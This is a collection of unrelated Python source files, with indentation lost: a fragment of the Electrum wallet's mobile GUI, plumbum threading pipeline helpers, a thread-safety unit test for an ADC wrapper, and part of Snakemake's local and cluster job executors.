def show_private_key(addr, pk_label, password):
if self.wallet.has_password() and password is None:
return
if not self.wallet.can_export():
return
try:
key = str(self.wallet.export_private_key(addr, password))
pk_label.data = key
except InvalidPassword:
self.show_error("Invalid PIN")
return
self.protected(_("Decrypt your private key?"), show_private_key, (addr, pk_label))
def import_channel_backup(self, encrypted):
d = Question(_('Import Channel Backup?'), lambda b: self._import_channel_backup(b, encrypted))
d.open()
def _import_channel_backup(self, b, encrypted):
if not b:
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.logger.exception("failed to import backup")
self.show_error("failed to import backup" + '\n' + str(e))
return
self.lightning_channels_dialog()
def lightning_status(self):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
status = _('Enabled')
else:
status = _('Enabled, non-recoverable channels')
else:
if self.wallet.can_have_lightning():
status = _('Not enabled')
else:
status = _("Not available for this wallet.")
return status
def on_lightning_status(self, root):
if self.wallet.has_lightning():
if self.wallet.lnworker.has_deterministic_node_id():
pass
else:
if self.wallet.db.get('seed_type') == 'segwit':
msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
else:
msg = _("Your channels cannot be recovered from seed. "
"This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
"If you want to have recoverable channels, you must create a new wallet with an Electrum seed")
self.show_info(msg)
elif self.wallet.can_have_lightning():
root.dismiss()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
d = Question(msg, self._enable_lightning, title=_('Enable Lightning?'))
d.open()
def _enable_lightning(self, b):
if not b:
return
self.wallet.init_lightning(password=self.password)
self.show_info(_('Lightning keys have been initialized.'))
|
plumbum_helpers.py
|
from __future__ import absolute_import
import functools
import io
import os
import sys
from os import O_CLOEXEC
from os import pipe2
from subprocess import PIPE
from threading import Thread
from plumbum.commands import BaseCommand
from plumbum.machines.base import PopenAddons
from six import reraise
def get_thread(func, args=None, kwargs=None):
return Thread(target=func, args=args, kwargs=kwargs)
class PopenedThread(Thread, PopenAddons):
def wait(self):
self.join()
e = self.exception[0]
if e is not None:
reraise(*e)
self.returncode = 0
return self.returncode
class ThreadCommand(BaseCommand):
__slots__ = ["_func"]
@staticmethod
def _wrapper(func, stdin, stdout, exception):
try:
func(stdin, stdout)
except:
e = sys.exc_info()
exception[0] = e
finally:
# We want writers to get SIGPIPE
stdin.close()
# and readers to get EOF
stdout.close()
def __init__(self, func):
self._func = func
def popen(self, args=(), **kwargs):
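        # Runs self._func on a thread while mimicking a Popen object: PIPE
        # arguments are turned into real OS pipes exposed as stdin/stdout.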
bufsize = kwargs.get("bufsize", -1)
stdin = kwargs.get("stdin", sys.stdin)
stdin.close = close
exposed_stdin = None
if stdin == PIPE:
(r, w) = pipe2(O_CLOEXEC)
stdin = io.open(r, "rb", bufsize)
exposed_stdin = io.open(w, "wb", bufsize)
stdout = kwargs.get("stdout", sys.stdout)
exposed_stdout = None
if stdout == PIPE:
(r, w) = pipe2(O_CLOEXEC)
stdout = w
exposed_stdout = io.open(r, "rb", bufsize)
else:
stdout = os.dup(stdout)
stdout = io.open(stdout, "wb", bufsize)
exception = [None]
t = PopenedThread(
target=self._wrapper, args=(self._func, stdin, stdout, exception)
)
t.stdin = exposed_stdin
t.stdout = exposed_stdout
t.stderr = None
t.exception = exception
t.start()
return t
class PipelineToThread(BaseCommand):
__slots__ = ["_cmd", "_func"]
def __init__(self, cmd, func):
self._cmd = cmd
self._func = func
def __repr__(self):
return "%s(%r, %r)" % (type(self).__name__, self._cmd, self._func)
@property
def machine(self):
return self._cmd.machine
def popen(self, args=(), **kwargs):
kwargs = kwargs.copy()
thread_stdout = kwargs.get("stdout", sys.stdout)
kwargs["stdout"] = PIPE
p = self._cmd.popen(bufsize=0, **kwargs)
thread_stdin = p.stdout
# Wrap self._func in order to catch its exceptions (these we will
        # re-raise in the main thread). We'll also close the subprocess's
# stdout when the thread exits.
p._thread_exception = None
@functools.wraps(self._func)
def func(*args, **kwargs):
try:
self._func(*args, **kwargs)
except:
e = sys.exc_info()
p._thread_exception = e
finally:
# Let our subprocess know that nobody is reading its output
# anymore. Let any downstream processes know that nobody is
# producing input for it anymore.
thread_stdin.close()
thread_stdout.close()
if thread_stdout == PIPE:
(p2cread, p2cwrite) = pipe2(O_CLOEXEC)
# expose the thread's stdout on the Popen object
p.stdout = io.open(p2cread, "rb")
thread_stdout = p2cwrite
else:
thread_stdout = os.dup(thread_stdout.fileno())
# prevent caller from reading from the subprocess's stdout
# that's not its job.
p.stdout = None
thread_stdout = io.open(thread_stdout, "wb")
t = get_thread(func, args=(thread_stdin, thread_stdout))
original_wait = p.wait
def wait(*args, **kwargs):
code = original_wait(*args, **kwargs)
t.join()
if p._thread_exception:
reraise(*p._thread_exception)
return code
p.wait = wait
t.start()
return p
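# Monkey-patch plumbum so that `command / python_callable` builds a
# PipelineToThread, piping the command's stdout into the callable.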
BaseCommand.__truediv__ = lambda s, o: PipelineToThread(s, o)
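# Usage sketch (hypothetical names; a minimal illustration, not part of the
# original module):
#
#   from plumbum.cmd import cat
#
#   def count_bytes(stdin, stdout):
#       stdout.write(str(len(stdin.read())).encode())
#
#   (cat["some_file.txt"] / count_bytes).run()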
|
test_adc_thread_safe.py
|
import threading
import time
import unittest
import mock
from greenpithumb import adc_thread_safe
class AdcTest(unittest.TestCase):
def setUp(self):
self.counter = 0
def increment_counter(self, amount):
# Increment counter in a deliberately inefficient way to invite a race
# condition if this is called by more than one thread at once.
for i in range(amount):
current = self.counter
time.sleep(0.01)
self.counter = current + 1
def test_read_adc_is_thread_safe(self):
raw_adc = mock.Mock()
raw_adc.read_adc.side_effect = lambda x: self.increment_counter(10)
adc = adc_thread_safe.Adc(raw_adc)
threads = []
# Spawn several threads to call read_adc concurrently to see if they
# trigger a race condition.
for _ in range(5):
threads.append(threading.Thread(target=lambda: adc.read_adc(0)))
for t in threads:
t.start()
for t in threads:
t.join()
# Check that the threads incremented the counter correctly.
self.assertEqual(10 * 5, self.counter)
|
__init__.py
|
__author__ = "Johannes Köster"
__copyright__ = "Copyright 2021, Johannes Köster"
__email__ = "johannes.koester@uni-due.de"
__license__ = "MIT"
import os
import sys
import contextlib
import time
import datetime
import json
import textwrap
import stat
import shutil
import shlex
import threading
import concurrent.futures
import subprocess
import signal
import tempfile
from functools import partial
from itertools import chain
from collections import namedtuple
from snakemake.io import _IOFile
import random
import base64
import uuid
import re
import math
from snakemake.jobs import Job
from snakemake.shell import shell
from snakemake.logging import logger
from snakemake.stats import Stats
from snakemake.utils import format, Unformattable, makedirs
from snakemake.io import get_wildcard_names, Wildcards
from snakemake.exceptions import print_exception, get_exception_origin
from snakemake.exceptions import format_error, RuleException, log_verbose_traceback
from snakemake.exceptions import (
ProtectedOutputException,
WorkflowError,
ImproperShadowException,
SpawnedJobError,
CacheMissException,
)
from snakemake.common import Mode, __version__, get_container_image, get_uuid
# TODO move each executor into a separate submodule
def sleep():
# do not sleep on CI. In that case we just want to quickly test everything.
if os.environ.get("CI") != "true":
time.sleep(10)
class AbstractExecutor:
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
printthreads=True,
latency_wait=3,
keepincomplete=False,
keepmetadata=True,
):
self.workflow = workflow
self.dag = dag
self.quiet = quiet
self.printreason = printreason
self.printshellcmds = printshellcmds
self.printthreads = printthreads
self.latency_wait = latency_wait
self.keepincomplete = keepincomplete
self.keepmetadata = keepmetadata
def get_default_remote_provider_args(self):
if self.workflow.default_remote_provider:
return (
" --default-remote-provider {} " "--default-remote-prefix {} "
).format(
self.workflow.default_remote_provider.__module__.split(".")[-1],
self.workflow.default_remote_prefix,
)
return ""
def _format_key_value_args(self, flag, kwargs):
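        # e.g. flag="--set-threads", kwargs={"myrule": 4} -> " --set-threads myrule=4 "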
if kwargs:
return " {} {} ".format(
flag,
" ".join("{}={}".format(key, value) for key, value in kwargs.items()),
)
return ""
def get_set_threads_args(self):
return self._format_key_value_args(
"--set-threads", self.workflow.overwrite_threads
)
def get_set_scatter_args(self):
return self._format_key_value_args(
"--set-scatter", self.workflow.overwrite_scatter
)
def get_default_resources_args(self):
if self.workflow.default_resources.args is not None:
def fmt(res):
if isinstance(res, str):
res = res.replace('"', r"\"")
return '"{}"'.format(res)
args = " --default-resources {} ".format(
" ".join(map(fmt, self.workflow.default_resources.args))
)
return args
return ""
def get_behavior_args(self):
if self.workflow.conda_not_block_search_path_envvars:
return " --conda-not-block-search-path-envvars "
return ""
def run_jobs(self, jobs, callback=None, submit_callback=None, error_callback=None):
"""Run a list of jobs that is ready at a given point in time.
By default, this method just runs each job individually.
        This method can be overridden to submit many jobs in a more efficient way than one-by-one.
Note that in any case, for each job, the callback functions have to be called individually!
"""
for job in jobs:
self.run(
job,
callback=callback,
submit_callback=submit_callback,
error_callback=error_callback,
)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
"""Run a specific job or group job."""
self._run(job)
callback(job)
def shutdown(self):
pass
def cancel(self):
pass
def _run(self, job):
job.check_protected_output()
self.printjob(job)
def rule_prefix(self, job):
return "local " if job.is_local else ""
def printjob(self, job):
job.log_info(skip_dynamic=True)
def print_job_error(self, job, msg=None, **kwargs):
job.log_error(msg, **kwargs)
def handle_job_success(self, job):
pass
def handle_job_error(self, job):
pass
class DryrunExecutor(AbstractExecutor):
def printjob(self, job):
super().printjob(job)
if job.is_group():
for j in job.jobs:
self.printcache(j)
else:
self.printcache(job)
def printcache(self, job):
if self.workflow.is_cached_rule(job.rule):
if self.workflow.output_file_cache.exists(job):
logger.info(
"Output file {} will be obtained from global between-workflow cache.".format(
job.output[0]
)
)
else:
logger.info(
"Output file {} will be written to global between-workflow cache.".format(
job.output[0]
)
)
class RealExecutor(AbstractExecutor):
def __init__(
self,
workflow,
dag,
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
assume_shared_fs=True,
keepincomplete=False,
keepmetadata=False,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.assume_shared_fs = assume_shared_fs
self.stats = Stats()
self.snakefile = workflow.main_snakefile
def register_job(self, job):
job.register()
def _run(self, job, callback=None, error_callback=None):
super()._run(job)
self.stats.report_job_start(job)
try:
self.register_job(job)
except IOError as e:
logger.info(
"Failed to set marker file for job started ({}). "
"Snakemake will work, but cannot ensure that output files "
"are complete in case of a kill signal or power loss. "
"Please ensure write permissions for the "
"directory {}".format(e, self.workflow.persistence.path)
)
def handle_job_success(
self,
job,
upload_remote=True,
handle_log=True,
handle_touch=True,
ignore_missing_output=False,
):
job.postprocess(
upload_remote=upload_remote,
handle_log=handle_log,
handle_touch=handle_touch,
ignore_missing_output=ignore_missing_output,
latency_wait=self.latency_wait,
assume_shared_fs=self.assume_shared_fs,
keep_metadata=self.keepmetadata,
)
self.stats.report_job_end(job)
def handle_job_error(self, job, upload_remote=True):
job.postprocess(
error=True,
assume_shared_fs=self.assume_shared_fs,
latency_wait=self.latency_wait,
)
def get_additional_args(self):
"""Return a string to add to self.exec_job that includes additional
arguments from the command line. This is currently used in the
ClusterExecutor and CPUExecutor, as both were using the same
code. Both have base class of the RealExecutor.
"""
additional = ""
if not self.workflow.cleanup_scripts:
additional += " --skip-script-cleanup "
if self.workflow.shadow_prefix:
additional += " --shadow-prefix {} ".format(self.workflow.shadow_prefix)
if self.workflow.use_conda:
additional += " --use-conda "
if self.workflow.conda_prefix:
additional += " --conda-prefix {} ".format(self.workflow.conda_prefix)
if self.workflow.use_singularity:
additional += " --use-singularity "
if self.workflow.singularity_prefix:
additional += " --singularity-prefix {} ".format(
self.workflow.singularity_prefix
)
if self.workflow.singularity_args:
additional += ' --singularity-args "{}"'.format(
self.workflow.singularity_args
)
if not self.workflow.execute_subworkflows:
additional += " --no-subworkflows"
if self.workflow.use_env_modules:
additional += " --use-envmodules"
if not self.keepmetadata:
additional += " --drop-metadata"
return additional
def format_job_pattern(self, pattern, job=None, **kwargs):
overwrite_workdir = []
if self.workflow.overwrite_workdir:
overwrite_workdir.extend(("--directory", self.workflow.overwrite_workdir))
overwrite_config = []
if self.workflow.overwrite_configfiles:
# add each of the overwriting configfiles in the original order
overwrite_config.append("--configfiles")
overwrite_config.extend(self.workflow.overwrite_configfiles)
if self.workflow.config_args:
overwrite_config.append("--config")
overwrite_config.extend(self.workflow.config_args)
printshellcmds = ""
if self.workflow.printshellcmds:
printshellcmds = "-p"
if not job.is_branched and not job.is_updated:
# Restrict considered rules. This does not work for updated jobs
# because they need to be updated in the spawned process as well.
rules = ["--allowed-rules"]
rules.extend(job.rules)
else:
rules = []
target = kwargs.get("target", job.get_targets())
snakefile = kwargs.get("snakefile", self.snakefile)
cores = kwargs.get("cores", self.cores)
if "target" in kwargs:
del kwargs["target"]
if "snakefile" in kwargs:
del kwargs["snakefile"]
if "cores" in kwargs:
del kwargs["cores"]
cmd = format(
pattern,
job=job,
attempt=job.attempt,
overwrite_workdir=overwrite_workdir,
overwrite_config=overwrite_config,
printshellcmds=printshellcmds,
workflow=self.workflow,
snakefile=snakefile,
cores=cores,
benchmark_repeats=job.benchmark_repeats if not job.is_group() else None,
target=target,
rules=rules,
**kwargs,
)
return cmd
class TouchExecutor(RealExecutor):
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
try:
# Touching of output files will be done by handle_job_success
time.sleep(0.1)
callback(job)
except OSError as ex:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job, ignore_missing_output=True)
_ProcessPoolExceptions = (KeyboardInterrupt,)
try:
from concurrent.futures.process import BrokenProcessPool
_ProcessPoolExceptions = (KeyboardInterrupt, BrokenProcessPool)
except ImportError:
pass
class CPUExecutor(RealExecutor):
def __init__(
self,
workflow,
dag,
workers,
printreason=False,
quiet=False,
printshellcmds=False,
use_threads=False,
latency_wait=3,
cores=1,
keepincomplete=False,
keepmetadata=True,
):
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
self.exec_job = "\\\n".join(
(
"cd {workflow.workdir_init} && ",
"{sys.executable} -m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote ",
"--attempt {attempt} --scheduler {workflow.scheduler_type} ",
"--force-use-threads --wrapper-prefix {workflow.wrapper_prefix} ",
"--max-inventory-time 0 --ignore-incomplete ",
"--latency-wait {latency_wait} ",
self.get_default_remote_provider_args(),
self.get_default_resources_args(),
self.get_behavior_args(),
self.get_set_scatter_args(),
self.get_set_threads_args(),
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} ",
"--notemp --quiet --no-hooks --nolock --mode {} ".format(
Mode.subprocess
),
)
)
self.exec_job += self.get_additional_args()
self.use_threads = use_threads
self.cores = cores
# Zero thread jobs do not need a thread, but they occupy additional workers.
# Hence we need to reserve additional workers for them.
self.workers = workers + 5
self.pool = concurrent.futures.ThreadPoolExecutor(max_workers=self.workers)
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
if job.is_group():
# if we still don't have enough workers for this group, create a new pool here
missing_workers = max(len(job) - self.workers, 0)
if missing_workers:
self.workers += missing_workers
self.pool = concurrent.futures.ThreadPoolExecutor(
max_workers=self.workers
)
# the future waits for the entire group job
future = self.pool.submit(self.run_group_job, job)
else:
future = self.run_single_job(job)
future.add_done_callback(partial(self._callback, job, callback, error_callback))
def job_args_and_prepare(self, job):
job.prepare()
conda_env = job.conda_env_path if self.workflow.use_conda else None
container_img = (
job.container_img_path if self.workflow.use_singularity else None
)
env_modules = job.env_modules if self.workflow.use_env_modules else None
benchmark = None
benchmark_repeats = job.benchmark_repeats or 1
if job.benchmark is not None:
benchmark = str(job.benchmark)
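# Note: the order of the returned tuple must match the positional
# parameters of run_wrapper() defined near the end of this file.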
return (
job.rule,
job.input._plainstrings(),
job.output._plainstrings(),
job.params,
job.wildcards,
job.threads,
job.resources,
job.log._plainstrings(),
benchmark,
benchmark_repeats,
conda_env,
container_img,
self.workflow.singularity_args,
env_modules,
self.workflow.use_singularity,
self.workflow.linemaps,
self.workflow.debug,
self.workflow.cleanup_scripts,
job.shadow_dir,
job.jobid,
self.workflow.edit_notebook,
job.rule.basedir,
)
def run_single_job(self, job):
if self.use_threads or (not job.is_shadow and not job.is_run):
future = self.pool.submit(
self.cached_or_run, job, run_wrapper, *self.job_args_and_prepare(job)
)
else:
# run directive jobs are spawned into subprocesses
future = self.pool.submit(self.cached_or_run, job, self.spawn_job, job)
return future
def run_group_job(self, job):
"""Run a pipe group job.
This lets all items run simultaneously."""
# we only have to consider pipe groups because in local running mode,
# these are the only groups that will occur
futures = [self.run_single_job(j) for j in job]
while True:
k = 0
for f in futures:
if f.done():
ex = f.exception()
if ex is not None:
# kill all shell commands of the other group jobs
# there can be only shell commands because the
# run directive is not allowed for pipe jobs
for j in job:
shell.kill(j.jobid)
raise ex
else:
k += 1
if k == len(futures):
return
time.sleep(1)
def spawn_job(self, job):
exec_job = self.exec_job
cmd = self.format_job_pattern(
exec_job, job=job, _quote_all=True, latency_wait=self.latency_wait
)
try:
subprocess.check_call(cmd, shell=True)
except subprocess.CalledProcessError as e:
raise SpawnedJobError()
def cached_or_run(self, job, run_func, *args):
"""
Either retrieve result from cache, or run job with given function.
"""
to_cache = self.workflow.is_cached_rule(job.rule)
try:
if to_cache:
self.workflow.output_file_cache.fetch(job)
return
except CacheMissException:
pass
run_func(*args)
if to_cache:
self.workflow.output_file_cache.store(job)
def shutdown(self):
self.pool.shutdown()
def cancel(self):
self.pool.shutdown()
def _callback(self, job, callback, error_callback, future):
try:
ex = future.exception()
if ex is not None:
raise ex
callback(job)
except _ProcessPoolExceptions:
self.handle_job_error(job)
# no error callback, just silently ignore the interrupt as the main scheduler is also killed
except SpawnedJobError:
# don't print error message, this is done by the spawned subprocess
error_callback(job)
except (Exception, BaseException) as ex:
self.print_job_error(job)
if not (job.is_group() or job.shellcmd) or self.workflow.verbose:
print_exception(ex, self.workflow.linemaps)
error_callback(job)
def handle_job_success(self, job):
super().handle_job_success(job)
def handle_job_error(self, job):
super().handle_job_error(job)
if not self.keepincomplete:
job.cleanup()
self.workflow.persistence.cleanup(job)
class ClusterExecutor(RealExecutor):
"""Backend for distributed execution.
The key idea is that a job is converted into a script that invokes Snakemake again, in whatever environment is targeted. The script is submitted to some job management platform (e.g. a cluster scheduler like slurm).
This class can be specialized to generate more specific backends, also for the cloud.
"""
default_jobscript = "jobscript.sh"
def __init__(
self,
workflow,
dag,
cores,
jobname="snakejob.{name}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
cluster_config=None,
local_input=None,
restart_times=None,
exec_job=None,
assume_shared_fs=True,
max_status_checks_per_second=1,
disable_default_remote_provider_args=False,
disable_get_default_resources_args=False,
keepincomplete=False,
keepmetadata=True,
):
from ratelimiter import RateLimiter
local_input = local_input or []
super().__init__(
workflow,
dag,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
assume_shared_fs=assume_shared_fs,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if not self.assume_shared_fs:
# use relative path to Snakefile
self.snakefile = os.path.relpath(workflow.main_snakefile)
jobscript = workflow.jobscript
if jobscript is None:
jobscript = os.path.join(os.path.dirname(__file__), self.default_jobscript)
try:
with open(jobscript) as f:
self.jobscript = f.read()
except IOError as e:
raise WorkflowError(e)
if not "jobid" in get_wildcard_names(jobname):
raise WorkflowError(
'Defined jobname ("{}") has to contain the wildcard {jobid}.'
)
if exec_job is None:
self.exec_job = "\\\n".join(
(
"{envvars} " "cd {workflow.workdir_init} && "
if assume_shared_fs
else "",
"{path:u} {sys.executable} " if assume_shared_fs else "python ",
"-m snakemake {target} --snakefile {snakefile} ",
"--force -j{cores} --keep-target-files --keep-remote --max-inventory-time 0 ",
"--wait-for-files {wait_for_files} --latency-wait {latency_wait} ",
" --attempt {attempt} {use_threads} --scheduler {workflow.scheduler_type} ",
"--wrapper-prefix {workflow.wrapper_prefix} ",
"{overwrite_workdir} {overwrite_config} {printshellcmds} {rules} "
"--nocolor --notemp --no-hooks --nolock ",
"--mode {} ".format(Mode.cluster),
)
)
else:
self.exec_job = exec_job
self.exec_job += self.get_additional_args()
if not disable_default_remote_provider_args:
self.exec_job += self.get_default_remote_provider_args()
if not disable_get_default_resources_args:
self.exec_job += self.get_default_resources_args()
self.exec_job += self.get_behavior_args()
self.exec_job += self.get_set_scatter_args()
self.exec_job += self.get_set_threads_args()
self.jobname = jobname
self._tmpdir = None
self.cores = cores if cores else ""
self.cluster_config = cluster_config if cluster_config else dict()
self.restart_times = restart_times
self.active_jobs = list()
self.lock = threading.Lock()
self.wait = True
self.wait_thread = threading.Thread(target=self._wait_for_jobs)
self.wait_thread.daemon = True
self.wait_thread.start()
self.max_status_checks_per_second = max_status_checks_per_second
self.status_rate_limiter = RateLimiter(
max_calls=self.max_status_checks_per_second, period=1
)
def shutdown(self):
with self.lock:
self.wait = False
self.wait_thread.join()
if not self.workflow.immediate_submit:
# Only delete tmpdir (containing jobscripts) if not using
# immediate_submit. With immediate_submit, jobs can be scheduled
# after this method is completed. Hence we have to keep the
# directory.
shutil.rmtree(self.tmpdir)
def cancel(self):
self.shutdown()
def _run(self, job, callback=None, error_callback=None):
if self.assume_shared_fs:
job.remove_existing_output()
job.download_remote_input()
super()._run(job, callback=callback, error_callback=error_callback)
@property
def tmpdir(self):
if self._tmpdir is None:
self._tmpdir = tempfile.mkdtemp(dir=".snakemake", prefix="tmp.")
return os.path.abspath(self._tmpdir)
def get_jobscript(self, job):
f = job.format_wildcards(self.jobname, cluster=self.cluster_wildcards(job))
if os.path.sep in f:
raise WorkflowError(
"Path separator ({}) found in job name {}. "
"This is not supported.".format(os.path.sep, f)
)
return os.path.join(self.tmpdir, f)
def format_job(self, pattern, job, **kwargs):
wait_for_files = []
path = ""
if self.assume_shared_fs:
wait_for_files.append(self.tmpdir)
wait_for_files.extend(job.get_wait_for_files())
# Prepend PATH of current python executable to PATH.
# This way, we ensure that the snakemake process in the cluster node runs
# in the same environment as the current process.
# This is necessary in order to find the pulp solver backends (e.g. coincbc).
path = "PATH='{}':$PATH".format(os.path.dirname(sys.executable))
format_p = partial(
self.format_job_pattern,
job=job,
properties=job.properties(cluster=self.cluster_params(job)),
latency_wait=self.latency_wait,
wait_for_files=wait_for_files,
path=path,
**kwargs,
)
try:
return format_p(pattern)
except KeyError as e:
raise WorkflowError(
"Error formatting jobscript: {} not found\n"
"Make sure that your custom jobscript is up to date.".format(e)
)
def write_jobscript(self, job, jobscript, **kwargs):
# only force threads if this is not a group job
# otherwise we want proper process handling
use_threads = "--force-use-threads" if not job.is_group() else ""
envvars = " ".join(
"{}={}".format(var, os.environ[var]) for var in self.workflow.envvars
)
exec_job = self.format_job(
self.exec_job,
job,
_quote_all=True,
use_threads=use_threads,
envvars=envvars,
**kwargs,
)
content = self.format_job(self.jobscript, job, exec_job=exec_job, **kwargs)
logger.debug("Jobscript:\n{}".format(content))
with open(jobscript, "w") as f:
print(content, file=f)
os.chmod(jobscript, os.stat(jobscript).st_mode | stat.S_IXUSR | stat.S_IRUSR)
def cluster_params(self, job):
"""Return wildcards object for job from cluster_config."""
cluster = self.cluster_config.get("__default__", dict()).copy()
cluster.update(self.cluster_config.get(job.name, dict()))
# Format values with available parameters from the job.
for key, value in list(cluster.items()):
if isinstance(value, str):
try:
cluster[key] = job.format_wildcards(value)
except NameError as e:
if job.is_group():
msg = (
"Failed to format cluster config for group job. "
"You have to ensure that your default entry "
"does not contain any items that group jobs "
"cannot provide, like {rule}, {wildcards}."
)
else:
msg = (
"Failed to format cluster config "
"entry for job {}.".format(job.rule.name)
)
raise WorkflowError(msg, e)
return cluster
def cluster_wildcards(self, job):
return Wildcards(fromdict=self.cluster_params(job))
def handle_job_success(self, job):
super().handle_job_success(
job, upload_remote=False, handle_log=False, handle_touch=False
)
def handle_job_error(self, job):
# TODO what about removing empty remote dirs?? This cannot be decided
# on the cluster node.
super().handle_job_error(job, upload_remote=False)
logger.debug("Cleanup job metadata.")
# We have to remove metadata here as well.
# It will be removed by the CPUExecutor in case of a shared FS,
# but we might not see the removal due to filesystem latency.
# By removing it again, we make sure that it is gone on the host FS.
if not self.keepincomplete:
self.workflow.persistence.cleanup(job)
# Also cleanup the jobs output files, in case the remote job
# was not able to, due to e.g. timeout.
logger.debug("Cleanup failed jobs output files.")
job.cleanup()
def print_cluster_job_error(self, job_info, jobid):
job = job_info.job
kind = (
"rule {}".format(job.rule.name)
if not job.is_group()
else "group job {}".format(job.groupid)
)
logger.error(
"Error executing {} on cluster (jobid: {}, external: "
"{}, jobscript: {}). For error details see the cluster "
"log and the log files of the involved rule(s).".format(
kind, jobid, job_info.jobid, job_info.jobscript
)
)
GenericClusterJob = namedtuple(
"GenericClusterJob",
"job jobid callback error_callback jobscript jobfinished jobfailed",
)
class GenericClusterExecutor(ClusterExecutor):
def __init__(
self,
workflow,
dag,
cores,
submitcmd="qsub",
statuscmd=None,
cluster_config=None,
jobname="snakejob.{rulename}.{jobid}.sh",
printreason=False,
quiet=False,
printshellcmds=False,
latency_wait=3,
restart_times=0,
assume_shared_fs=True,
max_status_checks_per_second=1,
keepincomplete=False,
keepmetadata=True,
):
self.submitcmd = submitcmd
if not assume_shared_fs and statuscmd is None:
raise WorkflowError(
"When no shared filesystem can be assumed, a "
"status command must be given."
)
self.statuscmd = statuscmd
self.external_jobid = dict()
super().__init__(
workflow,
dag,
cores,
jobname=jobname,
printreason=printreason,
quiet=quiet,
printshellcmds=printshellcmds,
latency_wait=latency_wait,
cluster_config=cluster_config,
restart_times=restart_times,
assume_shared_fs=assume_shared_fs,
max_status_checks_per_second=max_status_checks_per_second,
keepincomplete=keepincomplete,
keepmetadata=keepmetadata,
)
if statuscmd:
self.exec_job += " && exit 0 || exit 1"
elif assume_shared_fs:
# TODO wrap with watch and touch {jobrunning}
# check modification date of {jobrunning} in the wait_for_job method
self.exec_job += " && touch {jobfinished} || (touch {jobfailed}; exit 1)"
else:
raise WorkflowError(
"If no shared filesystem is used, you have to "
"specify a cluster status command."
)
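# Contract assumed by _wait_for_jobs(): the status command is invoked as
#   "<statuscmd> <external jobid>"
# and must print exactly "success", "failed" or "running" as its first output line.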
def cancel(self):
logger.info("Will exit after finishing currently running jobs.")
self.shutdown()
def register_job(self, job):
# Do not register job here.
# Instead do it manually once the jobid is known.
pass
def run(self, job, callback=None, submit_callback=None, error_callback=None):
super()._run(job)
workdir = os.getcwd()
jobid = job.jobid
jobscript = self.get_jobscript(job)
jobfinished = os.path.join(self.tmpdir, "{}.jobfinished".format(jobid))
jobfailed = os.path.join(self.tmpdir, "{}.jobfailed".format(jobid))
self.write_jobscript(
job, jobscript, jobfinished=jobfinished, jobfailed=jobfailed
)
if self.statuscmd:
ext_jobid = self.dag.incomplete_external_jobid(job)
if ext_jobid:
# Job is incomplete and still running.
# We simply register it and wait for completion or failure.
logger.info(
"Resuming incomplete job {} with external jobid '{}'.".format(
jobid, ext_jobid
)
)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
return
deps = " ".join(
self.external_jobid[f] for f in job.input if f in self.external_jobid
)
try:
submitcmd = job.format_wildcards(
self.submitcmd, dependencies=deps, cluster=self.cluster_wildcards(job)
)
except AttributeError as e:
raise WorkflowError(str(e), rule=job.rule if not job.is_group() else None)
try:
ext_jobid = (
subprocess.check_output(
'{submitcmd} "{jobscript}"'.format(
submitcmd=submitcmd, jobscript=jobscript
),
shell=True,
)
.decode()
.split("\n")
)
except subprocess.CalledProcessError as ex:
logger.error(
"Error submitting jobscript (exit code {}):\n{}".format(
ex.returncode, ex.output.decode()
)
)
error_callback(job)
return
if ext_jobid and ext_jobid[0]:
ext_jobid = ext_jobid[0]
self.external_jobid.update((f, ext_jobid) for f in job.output)
logger.info(
"Submitted {} {} with external jobid '{}'.".format(
"group job" if job.is_group() else "job", jobid, ext_jobid
)
)
self.workflow.persistence.started(job, external_jobid=ext_jobid)
submit_callback(job)
with self.lock:
self.active_jobs.append(
GenericClusterJob(
job,
ext_jobid,
callback,
error_callback,
jobscript,
jobfinished,
jobfailed,
)
)
def _wait_for_jobs(self):
success = "success"
failed = "failed"
running = "running"
if self.statuscmd is not None:
def job_status(job):
try:
# this command shall return "success", "failed" or "running"
return (
subprocess.check_output(
"{statuscmd} {jobid}".format(
jobid=job.jobid, statuscmd=self.statuscmd
),
shell=True,
)
.decode()
.split("\n")[0]
)
except subprocess.CalledProcessError as e:
if e.returncode < 0:
# Ignore SIGINT and all other issues due to signals
# because it will be caused by hitting e.g.
# Ctrl-C on the main process or sending killall to
# snakemake.
# Snakemake will handle the signal in
# the main process.
pass
else:
raise WorkflowError(
"Failed to obtain job status. "
"See above for error message."
)
else:
def job_status(job):
if os.path.exists(job.jobfinished):
os.remove(job.jobfinished)
os.remove(job.jobscript)
return success
if os.path.exists(job.jobfailed):
os.remove(job.jobfailed)
os.remove(job.jobscript)
return failed
return running
while True:
with self.lock:
if not self.wait:
return
active_jobs = self.active_jobs
self.active_jobs = list()
still_running = list()
